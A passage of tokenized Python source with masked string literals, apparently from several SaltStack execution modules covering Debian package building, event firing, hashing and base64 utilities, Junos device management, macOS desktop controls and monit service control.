<EOL> if exc . errno != errno . EEXIST : <EOL> raise <EOL> dsc_dir = tempfile . mkdtemp ( ) <EOL> try : <EOL> dscs = make_src_pkg ( dsc_dir , spec , sources , env , template , saltenv ) <EOL> except Exception as exc : <EOL> shutil . rmtree ( dsc_dir ) <EOL> log . error ( '<STR_LIT>' ) <EOL> return ret <EOL> for dsc in dscs : <EOL> afile = os . path . basename ( dsc ) <EOL> adist = os . path . join ( dest_dir , afile ) <EOL> shutil . copy ( dsc , adist ) <EOL> if dsc . endswith ( '<STR_LIT>' ) : <EOL> dbase = os . path . dirname ( dsc ) <EOL> results_dir = tempfile . mkdtemp ( ) <EOL> try : <EOL> __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( runas , dbase ) ) <EOL> __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( runas , results_dir ) ) <EOL> cmd = '<STR_LIT>' <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , runas = runas , python_shell = True ) <EOL> cmd = '<STR_LIT>' . 
format ( <EOL> dsc , results_dir ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , runas = runas , python_shell = True ) <EOL> for bfile in os . listdir ( results_dir ) : <EOL> full = os . path . join ( results_dir , bfile ) <EOL> bdist = os . path . join ( dest_dir , bfile ) <EOL> shutil . copy ( full , bdist ) <EOL> ret . setdefault ( '<STR_LIT>' , [ ] ) . append ( bdist ) <EOL> except Exception as exc : <EOL> log . error ( '<STR_LIT>' . format ( dsc , exc ) ) <EOL> finally : <EOL> shutil . rmtree ( results_dir ) <EOL> shutil . rmtree ( dsc_dir ) <EOL> return ret <EOL> def make_repo ( repodir , keyid = None , env = None ) : <EOL> '''<STR_LIT>''' <EOL> repoconf = os . path . join ( repodir , '<STR_LIT>' ) <EOL> if not os . path . isdir ( repoconf ) : <EOL> os . makedirs ( repoconf ) <EOL> codename , repocfg_dists = _get_repo_dists_env ( env ) <EOL> repoconfdist = os . path . join ( repoconf , '<STR_LIT>' ) <EOL> with salt . utils . fopen ( repoconfdist , '<STR_LIT:w>' ) as fow : <EOL> fow . write ( '<STR_LIT>' . format ( repocfg_dists ) ) <EOL> if keyid is not None : <EOL> with salt . utils . fopen ( repoconfdist , '<STR_LIT:a>' ) as fow : <EOL> fow . write ( '<STR_LIT>' . format ( keyid ) ) <EOL> repocfg_opts = _get_repo_options_env ( env ) <EOL> repoconfopts = os . path . join ( repoconf , '<STR_LIT>' ) <EOL> with salt . utils . fopen ( repoconfopts , '<STR_LIT:w>' ) as fow : <EOL> fow . write ( '<STR_LIT>' . format ( repocfg_opts ) ) <EOL> for debfile in os . listdir ( repodir ) : <EOL> if debfile . endswith ( '<STR_LIT>' ) : <EOL> cmd = '<STR_LIT>' . format ( codename , os . path . join ( repodir , debfile ) ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , cwd = repodir ) <EOL> if debfile . endswith ( '<STR_LIT>' ) : <EOL> cmd = '<STR_LIT>' . format ( codename , os . path . join ( repodir , debfile ) ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd , cwd = repodir ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import collections <EOL> import logging <EOL> import os <EOL> import sys <EOL> import traceback <EOL> import salt . crypt <EOL> import salt . utils . event <EOL> import salt . payload <EOL> import salt . transport <EOL> import salt . ext . six as six <EOL> __proxyenabled__ = [ '<STR_LIT:*>' ] <EOL> log = logging . getLogger ( __name__ ) <EOL> def _dict_subset ( keys , master_dict ) : <EOL> '''<STR_LIT>''' <EOL> return dict ( [ ( k , v ) for k , v in six . iteritems ( master_dict ) if k in keys ] ) <EOL> def fire_master ( data , tag , preload = None ) : <EOL> '''<STR_LIT>''' <EOL> if __opts__ . get ( '<STR_LIT>' , None ) : <EOL> log . warning ( '<STR_LIT>' . format ( tag ) ) <EOL> return False <EOL> if __opts__ [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> channel = salt . transport . Channel . factory ( __opts__ ) <EOL> load = { '<STR_LIT:id>' : __opts__ [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : tag , <EOL> '<STR_LIT:data>' : data , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> try : <EOL> channel . send ( load ) <EOL> except Exception : <EOL> pass <EOL> return True <EOL> if preload or __opts__ . get ( '<STR_LIT>' ) == '<STR_LIT>' : <EOL> if '<STR_LIT>' not in __opts__ : <EOL> __opts__ [ '<STR_LIT>' ] = '<STR_LIT>' . format ( <EOL> ip = salt . utils . ip_bracket ( __opts__ [ '<STR_LIT>' ] ) , <EOL> port = __opts__ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> auth = salt . crypt . SAuth ( __opts__ ) <EOL> load = { '<STR_LIT:id>' : __opts__ [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : tag , <EOL> '<STR_LIT:data>' : data , <EOL> '<STR_LIT>' : auth . gen_token ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> if isinstance ( preload , dict ) : <EOL> load . update ( preload ) <EOL> channel = salt . transport . Channel . factory ( __opts__ ) <EOL> try : <EOL> channel . send ( load ) <EOL> except Exception : <EOL> pass <EOL> return True <EOL> else : <EOL> try : <EOL> return salt . utils . event . 
MinionEvent ( __opts__ , listen = False ) . fire_event ( <EOL> { '<STR_LIT:data>' : data , '<STR_LIT>' : tag , '<STR_LIT>' : None , '<STR_LIT>' : None } , '<STR_LIT>' ) <EOL> except Exception : <EOL> exc_type , exc_value , exc_traceback = sys . exc_info ( ) <EOL> lines = traceback . format_exception ( exc_type , exc_value , exc_traceback ) <EOL> log . debug ( lines ) <EOL> return False <EOL> def fire ( data , tag ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> event = salt . utils . event . get_event ( '<STR_LIT>' , <EOL> sock_dir = __opts__ [ '<STR_LIT>' ] , <EOL> transport = __opts__ [ '<STR_LIT>' ] , <EOL> opts = __opts__ , <EOL> listen = False ) <EOL> return event . fire_event ( data , tag ) <EOL> except Exception : <EOL> exc_type , exc_value , exc_traceback = sys . exc_info ( ) <EOL> lines = traceback . format_exception ( exc_type , exc_value , exc_traceback ) <EOL> log . debug ( lines ) <EOL> return False <EOL> def send ( tag , <EOL> data = None , <EOL> preload = None , <EOL> with_env = False , <EOL> with_grains = False , <EOL> with_pillar = False , <EOL> with_env_opts = False , <EOL> ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> data_dict = { } <EOL> if with_env : <EOL> if isinstance ( with_env , list ) : <EOL> data_dict [ '<STR_LIT>' ] = _dict_subset ( with_env , dict ( os . environ ) ) <EOL> else : <EOL> data_dict [ '<STR_LIT>' ] = dict ( os . environ ) <EOL> if with_grains : <EOL> if isinstance ( with_grains , list ) : <EOL> data_dict [ '<STR_LIT>' ] = _dict_subset ( with_grains , __grains__ ) <EOL> else : <EOL> data_dict [ '<STR_LIT>' ] = __grains__ <EOL> if with_pillar : <EOL> if isinstance ( with_pillar , list ) : <EOL> data_dict [ '<STR_LIT>' ] = _dict_subset ( with_pillar , __pillar__ ) <EOL> else : <EOL> data_dict [ '<STR_LIT>' ] = __pillar__ <EOL> if with_env_opts : <EOL> data_dict [ '<STR_LIT>' ] = __opts__ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> data_dict [ '<STR_LIT>' ] = __opts__ . get ( '<STR_LIT>' ) <EOL> if kwargs : <EOL> data_dict . 
update ( kwargs ) <EOL> if isinstance ( data , collections . Mapping ) : <EOL> data_dict . update ( data ) <EOL> return fire_master ( data_dict , tag , preload = preload ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import base64 <EOL> import hashlib <EOL> import hmac <EOL> import StringIO <EOL> import salt . exceptions <EOL> import salt . ext . six as six <EOL> import salt . utils <EOL> def digest ( instr , checksum = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> hashing_funcs = { <EOL> '<STR_LIT>' : __salt__ [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : __salt__ [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : __salt__ [ '<STR_LIT>' ] , <EOL> } <EOL> hash_func = hashing_funcs . get ( checksum ) <EOL> if hash_func is None : <EOL> raise salt . exceptions . CommandExecutionError ( <EOL> "<STR_LIT>" . format ( checksum ) ) <EOL> return hash_func ( instr ) <EOL> def digest_file ( infile , checksum = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> if not __salt__ [ '<STR_LIT>' ] ( infile ) : <EOL> raise salt . exceptions . CommandExecutionError ( <EOL> "<STR_LIT>" . format ( infile ) ) <EOL> with open ( infile , '<STR_LIT:rb>' ) as f : <EOL> file_hash = __salt__ [ '<STR_LIT>' ] ( f . read ( ) , checksum ) <EOL> return file_hash <EOL> def base64_b64encode ( instr ) : <EOL> '''<STR_LIT>''' <EOL> if six . PY3 : <EOL> b = salt . utils . to_bytes ( instr ) <EOL> b64 = base64 . b64encode ( b ) <EOL> return salt . utils . to_str ( b64 ) <EOL> return base64 . b64encode ( instr ) <EOL> def base64_b64decode ( instr ) : <EOL> '''<STR_LIT>''' <EOL> if six . PY3 : <EOL> b = salt . utils . to_bytes ( instr ) <EOL> data = base64 . b64decode ( b ) <EOL> try : <EOL> return salt . utils . to_str ( data ) <EOL> except UnicodeDecodeError : <EOL> return data <EOL> return base64 . b64decode ( instr ) <EOL> def base64_encodestring ( instr ) : <EOL> '''<STR_LIT>''' <EOL> if six . PY3 : <EOL> b = salt . utils . to_bytes ( instr ) <EOL> b64 = base64 . encodebytes ( b ) <EOL> return salt . utils . to_str ( b64 ) <EOL> return base64 . encodestring ( instr ) <EOL> def base64_encodefile ( fname ) : <EOL> '''<STR_LIT>''' <EOL> encoded_f = StringIO . 
StringIO ( ) <EOL> with open ( fname , '<STR_LIT:rb>' ) as f : <EOL> base64 . encode ( f , encoded_f ) <EOL> encoded_f . seek ( <NUM_LIT:0> ) <EOL> return encoded_f . read ( ) <EOL> def base64_decodestring ( instr ) : <EOL> '''<STR_LIT>''' <EOL> if six . PY3 : <EOL> b = salt . utils . to_bytes ( instr ) <EOL> data = base64 . decodebytes ( b ) <EOL> try : <EOL> return salt . utils . to_str ( data ) <EOL> except UnicodeDecodeError : <EOL> return data <EOL> return base64 . decodestring ( instr ) <EOL> def base64_decodefile ( instr , outfile ) : <EOL> r'''<STR_LIT>''' <EOL> encoded_f = StringIO . StringIO ( instr ) <EOL> with open ( outfile , '<STR_LIT:wb>' ) as f : <EOL> base64 . decode ( encoded_f , f ) <EOL> return True <EOL> def md5_digest ( instr ) : <EOL> '''<STR_LIT>''' <EOL> if six . PY3 : <EOL> b = salt . utils . to_bytes ( instr ) <EOL> return hashlib . md5 ( b ) . hexdigest ( ) <EOL> return hashlib . md5 ( instr ) . hexdigest ( ) <EOL> def sha256_digest ( instr ) : <EOL> '''<STR_LIT>''' <EOL> if six . PY3 : <EOL> b = salt . utils . to_bytes ( instr ) <EOL> return hashlib . sha256 ( b ) . hexdigest ( ) <EOL> return hashlib . sha256 ( instr ) . hexdigest ( ) <EOL> def sha512_digest ( instr ) : <EOL> '''<STR_LIT>''' <EOL> if six . PY3 : <EOL> b = salt . utils . to_bytes ( instr ) <EOL> return hashlib . sha512 ( b ) . hexdigest ( ) <EOL> return hashlib . sha512 ( instr ) . hexdigest ( ) <EOL> def hmac_signature ( string , shared_secret , challenge_hmac ) : <EOL> '''<STR_LIT>''' <EOL> if six . PY3 : <EOL> msg = salt . utils . to_bytes ( string ) <EOL> key = salt . utils . to_bytes ( shared_secret ) <EOL> challenge = salt . utils . to_bytes ( challenge_hmac ) <EOL> else : <EOL> msg = string <EOL> key = shared_secret <EOL> challenge = challenge_hmac <EOL> hmac_hash = hmac . new ( key , msg , hashlib . sha256 ) <EOL> valid_hmac = base64 . b64encode ( hmac_hash . digest ( ) ) <EOL> return valid_hmac == challenge </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import logging <EOL> import json <EOL> from lxml import etree <EOL> try : <EOL> from jnpr . junos import Device <EOL> from jnpr . junos . utils . sw import SW <EOL> from jnpr . junos . utils . scp import SCP <EOL> import jnpr . junos . utils <EOL> import jnpr . junos . cfg <EOL> HAS_JUNOS = True <EOL> except ImportError : <EOL> HAS_JUNOS = False <EOL> log = logging . getLogger ( __name__ ) <EOL> __virtualname__ = '<STR_LIT>' <EOL> __proxyenabled__ = [ '<STR_LIT>' ] <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if HAS_JUNOS and '<STR_LIT>' in __opts__ : <EOL> return __virtualname__ <EOL> else : <EOL> return ( False , '<STR_LIT>' ) <EOL> def facts_refresh ( ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> ret [ '<STR_LIT>' ] = True <EOL> try : <EOL> ret [ '<STR_LIT:message>' ] = conn . facts_refresh ( ) <EOL> except Exception as exception : <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' . format ( exception ) <EOL> ret [ '<STR_LIT>' ] = False <EOL> return ret <EOL> def facts ( ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> ret [ '<STR_LIT:message>' ] = json . dumps ( conn . facts ) <EOL> ret [ '<STR_LIT>' ] = True <EOL> return ret <EOL> def call_rpc ( cmd = None , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> ret [ '<STR_LIT>' ] = True <EOL> op = dict ( ) <EOL> if '<STR_LIT>' in kwargs and isinstance ( kwargs [ '<STR_LIT>' ] [ - <NUM_LIT:1> ] , dict ) : <EOL> op . update ( kwargs [ '<STR_LIT>' ] [ - <NUM_LIT:1> ] ) <EOL> else : <EOL> op . update ( kwargs ) <EOL> for k , v in op . iteritems ( ) : <EOL> op [ k ] = str ( v ) <EOL> op [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> try : <EOL> if cmd in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> filter_reply = None <EOL> if len ( args ) > <NUM_LIT:0> : <EOL> filter_reply = etree . 
XML ( args [ <NUM_LIT:0> ] ) <EOL> ret [ '<STR_LIT:message>' ] = getattr ( conn . rpc , cmd . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) ) ( filter_reply , options = op ) <EOL> else : <EOL> ret [ '<STR_LIT:message>' ] = getattr ( conn . rpc , cmd . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) ) ( op ) <EOL> except Exception as exception : <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' . format ( exception ) <EOL> ret [ '<STR_LIT>' ] = False <EOL> if '<STR_LIT>' in op : <EOL> f = open ( op [ '<STR_LIT>' ] , '<STR_LIT:w>' ) <EOL> f . write ( ret [ '<STR_LIT:message>' ] ) <EOL> f . close ( ) <EOL> return ret <EOL> def set_hostname ( hostname = None , commit_change = True ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> if hostname is None : <EOL> ret [ '<STR_LIT>' ] = False <EOL> return ret <EOL> set_string = '<STR_LIT>' . format ( hostname ) <EOL> conn . cu . load ( set_string , format = '<STR_LIT>' ) <EOL> if commit_change : <EOL> return commit ( ) <EOL> else : <EOL> ret [ '<STR_LIT>' ] = True <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( hostname ) <EOL> return ret <EOL> def commit ( ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = { } <EOL> commit_ok = conn . cu . commit_check ( ) <EOL> if commit_ok : <EOL> try : <EOL> conn . cu . commit ( confirm = True ) <EOL> ret [ '<STR_LIT>' ] = True <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' <EOL> except Exception as exception : <EOL> ret [ '<STR_LIT>' ] = False <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' . format ( <EOL> exception ) <EOL> else : <EOL> ret [ '<STR_LIT>' ] = False <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' <EOL> return ret <EOL> def rollback ( ) : <EOL> '''<STR_LIT>''' <EOL> ret = dict ( ) <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret [ '<STR_LIT>' ] = conn . cu . 
rollback ( <NUM_LIT:0> ) <EOL> if ret [ '<STR_LIT>' ] : <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' <EOL> else : <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' <EOL> return ret <EOL> def diff ( ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> ret [ '<STR_LIT>' ] = True <EOL> ret [ '<STR_LIT:message>' ] = conn . cu . diff ( ) <EOL> return ret <EOL> def ping ( ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> ret [ '<STR_LIT:message>' ] = conn . probe ( ) <EOL> if ret [ '<STR_LIT:message>' ] : <EOL> ret [ '<STR_LIT>' ] = True <EOL> else : <EOL> ret [ '<STR_LIT>' ] = False <EOL> return ret <EOL> def cli ( command = None ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> ret [ '<STR_LIT:message>' ] = conn . cli ( command ) <EOL> ret [ '<STR_LIT>' ] = True <EOL> return ret <EOL> def shutdown ( time = <NUM_LIT:0> ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> sw = SW ( conn ) <EOL> try : <EOL> shut = sw . poweroff ( ) <EOL> shut ( time ) <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' <EOL> ret [ '<STR_LIT>' ] = False <EOL> except Exception as exception : <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' <EOL> ret [ '<STR_LIT>' ] = False <EOL> return ret <EOL> def install_config ( path = None , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> ret [ '<STR_LIT>' ] = True <EOL> if '<STR_LIT>' in kwargs : <EOL> conn . timeout = kwargs [ '<STR_LIT>' ] <EOL> options = { '<STR_LIT:path>' : path } <EOL> try : <EOL> conn . cu . load ( ** options ) <EOL> conn . cu . pdiff ( ) <EOL> except Exception as exception : <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' . format ( <EOL> exception ) <EOL> ret [ '<STR_LIT>' ] = False <EOL> if conn . cu . commit_check ( ) : <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' <EOL> conn . cu . 
commit ( ) <EOL> else : <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' <EOL> ret [ '<STR_LIT>' ] = False <EOL> conn . cu . rollback ( ) <EOL> return ret <EOL> def zeroize ( ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> ret [ '<STR_LIT>' ] = True <EOL> try : <EOL> conn . cli ( '<STR_LIT>' ) <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' <EOL> except Exception as exception : <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' . format ( exception ) <EOL> ret [ '<STR_LIT>' ] = False <EOL> return ret <EOL> def install_os ( path = None , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> ret [ '<STR_LIT>' ] = True <EOL> if '<STR_LIT>' in kwargs : <EOL> conn . timeout = kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> install = conn . sw . install ( path , progress = True ) <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' <EOL> except Exception as exception : <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' . format ( exception ) <EOL> ret [ '<STR_LIT>' ] = False <EOL> if '<STR_LIT>' in kwargs and kwargs [ '<STR_LIT>' ] is True : <EOL> rbt = conn . sw . reboot ( ) <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' <EOL> return ret <EOL> def file_copy ( src = None , dest = None ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> ret [ '<STR_LIT>' ] = True <EOL> try : <EOL> with SCP ( conn , progress = True ) as scp : <EOL> scp . put ( src , dest ) <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' . format ( <EOL> src , dest ) <EOL> except Exception as exception : <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' . format ( exception ) <EOL> ret [ '<STR_LIT>' ] = False <EOL> return ret </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import salt . utils <EOL> from salt . exceptions import CommandExecutionError <EOL> __virtualname__ = '<STR_LIT>' <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if salt . utils . is_darwin ( ) : <EOL> return __virtualname__ <EOL> return False , '<STR_LIT>' <EOL> def get_output_volume ( ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' <EOL> call = __salt__ [ '<STR_LIT>' ] ( <EOL> cmd , <EOL> output_loglevel = '<STR_LIT>' , <EOL> python_shell = False <EOL> ) <EOL> _check_cmd ( call ) <EOL> return call . get ( '<STR_LIT>' ) <EOL> def set_output_volume ( volume ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' . format ( volume ) <EOL> call = __salt__ [ '<STR_LIT>' ] ( <EOL> cmd , <EOL> output_loglevel = '<STR_LIT>' , <EOL> python_shell = False <EOL> ) <EOL> _check_cmd ( call ) <EOL> return get_output_volume ( ) <EOL> def screensaver ( ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' <EOL> call = __salt__ [ '<STR_LIT>' ] ( <EOL> cmd , <EOL> output_loglevel = '<STR_LIT>' , <EOL> python_shell = False <EOL> ) <EOL> _check_cmd ( call ) <EOL> return True <EOL> def lock ( ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' <EOL> call = __salt__ [ '<STR_LIT>' ] ( <EOL> cmd , <EOL> output_loglevel = '<STR_LIT>' , <EOL> python_shell = False <EOL> ) <EOL> _check_cmd ( call ) <EOL> return True <EOL> def say ( * words ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' . format ( '<STR_LIT:U+0020>' . join ( words ) ) <EOL> call = __salt__ [ '<STR_LIT>' ] ( <EOL> cmd , <EOL> output_loglevel = '<STR_LIT>' , <EOL> python_shell = False <EOL> ) <EOL> _check_cmd ( call ) <EOL> return True <EOL> def _check_cmd ( call ) : <EOL> '''<STR_LIT>''' <EOL> if call [ '<STR_LIT>' ] != <NUM_LIT:0> : <EOL> comment = '<STR_LIT>' <EOL> std_err = call . get ( '<STR_LIT>' ) <EOL> std_out = call . 
get ( '<STR_LIT>' ) <EOL> if std_err : <EOL> comment += std_err <EOL> if std_out : <EOL> comment += std_out <EOL> raise CommandExecutionError ( '<STR_LIT>' . format ( comment ) ) <EOL> return call </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import re <EOL> import salt . utils <EOL> __func_alias__ = { <EOL> '<STR_LIT>' : '<STR_LIT:id>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def __virtual__ ( ) : <EOL> if salt . utils . which ( '<STR_LIT>' ) is not None : <EOL> return True <EOL> return ( False , '<STR_LIT>' ) <EOL> def start ( name ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' . format ( name ) <EOL> return not __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) <EOL> def stop ( name ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' . format ( name ) <EOL> return not __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) <EOL> def restart ( name ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' . format ( name ) <EOL> return not __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) <EOL> def unmonitor ( name ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' . format ( name ) <EOL> return not __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) <EOL> def monitor ( name ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' . format ( name ) <EOL> return not __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) <EOL> def summary ( svc_name = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> cmd = '<STR_LIT>' <EOL> res = __salt__ [ '<STR_LIT>' ] ( cmd ) . splitlines ( ) <EOL> for line in res : <EOL> if '<STR_LIT>' in line : <EOL> return dict ( monit = '<STR_LIT>' , result = False ) <EOL> elif not line or svc_name not in line or '<STR_LIT>' in line : <EOL> continue <EOL> else : <EOL> parts = line . split ( '<STR_LIT>' ) <EOL> if len ( parts ) == <NUM_LIT:3> : <EOL> resource , name , status_ = ( <EOL> parts [ <NUM_LIT:0> ] . strip ( ) , parts [ <NUM_LIT:1> ] , parts [ <NUM_LIT:2> ] . 
strip ( ) <EOL> ) <EOL> if svc_name != '<STR_LIT>' and svc_name != name : <EOL> continue <EOL> if resource not in ret : <EOL> ret [ resource ] = { } <EOL> ret [ resource ] [ name ] = status_ <EOL> return ret <EOL> def status ( svc_name = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' <EOL> res = __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> prostr = '<STR_LIT>' + '<STR_LIT:U+0020>' * <NUM_LIT> <EOL> s = res . replace ( '<STR_LIT>' , prostr ) . replace ( "<STR_LIT:'>" , '<STR_LIT>' ) . split ( '<STR_LIT>' ) <EOL> entries = { } <EOL> for process in s [ <NUM_LIT:1> : - <NUM_LIT:1> ] : <EOL> pro = process . splitlines ( ) <EOL> tmp = { } <EOL> for items in pro : <EOL> key = items [ : <NUM_LIT> ] . strip ( ) <EOL> tmp [ key ] = items [ <NUM_LIT> : ] . strip ( ) <EOL> entries [ pro [ <NUM_LIT:0> ] . split ( ) [ <NUM_LIT:1> ] ] = tmp <EOL> if svc_name == '<STR_LIT>' : <EOL> ret = entries <EOL> else : <EOL> ret = entries . get ( svc_name , '<STR_LIT>' ) <EOL> return ret <EOL> def reload_ ( ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' <EOL> return not __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) <EOL> def configtest ( ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> cmd = '<STR_LIT>' <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> if out [ '<STR_LIT>' ] != <NUM_LIT:0> : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> ret [ '<STR_LIT>' ] = out [ '<STR_LIT>' ] <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> ret [ '<STR_LIT>' ] = out [ '<STR_LIT>' ] <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> return ret <EOL> def version ( ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd ) . splitlines ( ) <EOL> ret = out [ <NUM_LIT:0> ] . split ( ) <EOL> return ret [ - <NUM_LIT:1> ] <EOL> def id_ ( reset = False ) : <EOL> '''<STR_LIT>''' <EOL> if reset : <EOL> id_pattern = re . 
compile ( r'<STR_LIT>' ) <EOL> cmd = '<STR_LIT>' <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = True ) <EOL> ret = id_pattern . search ( out [ '<STR_LIT>' ] ) . group ( '<STR_LIT:id>' ) <EOL> return ret if ret else False <EOL> else : <EOL> cmd = '<STR_LIT>' <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> ret = out . split ( '<STR_LIT::>' ) [ - <NUM_LIT:1> ] . strip ( ) <EOL> return ret <EOL> def validate ( ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' <EOL> return not __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import logging <EOL> import struct <EOL> log = logging . getLogger ( __name__ ) <EOL> try : <EOL> import pypureomapi as omapi <EOL> omapi_support = True <EOL> except ImportError as e : <EOL> omapi_support = False <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if omapi_support : <EOL> return '<STR_LIT>' <EOL> return ( False , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def _conn ( ) : <EOL> server_ip = __pillar__ . get ( '<STR_LIT>' , <EOL> __opts__ . get ( '<STR_LIT>' , '<STR_LIT:127.0.0.1>' ) ) <EOL> server_port = __pillar__ . get ( '<STR_LIT>' , <EOL> __opts__ . get ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> key = __pillar__ . get ( '<STR_LIT>' , <EOL> __opts__ . get ( '<STR_LIT>' , None ) ) <EOL> username = __pillar__ . get ( 